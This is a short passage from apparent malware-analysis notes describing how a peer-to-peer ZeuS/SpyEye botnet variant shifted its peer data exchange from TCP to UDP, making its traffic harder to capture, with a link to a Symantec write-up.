Another noticeable update is that communication has shifted more and more to UDP. As we have previously discussed, the bots would contact each other by using a sort of homemade UDP handshake. If successful, this would cause the bots to exchange TCP data, such as configuration files, list of other peers, etc. However, TCP communications are easy to track and dump, and the bot does not perform any authentication on the packets exchanged, so anyone can impersonate a bot and successfully communicate with other bots, downloading stuff like configuration data.
In this new strain, the data exchange is also now happening in UDP. Given the stateless nature of this protocol, it is more difficult to capture and extract data from bot communications.
Relevant Link:
http://www.symantec.com/connect/blogs/cracking-new-p2p-variant-zeusbotspyeye
Copyright (c) 2016 LittleHann All rights reserved
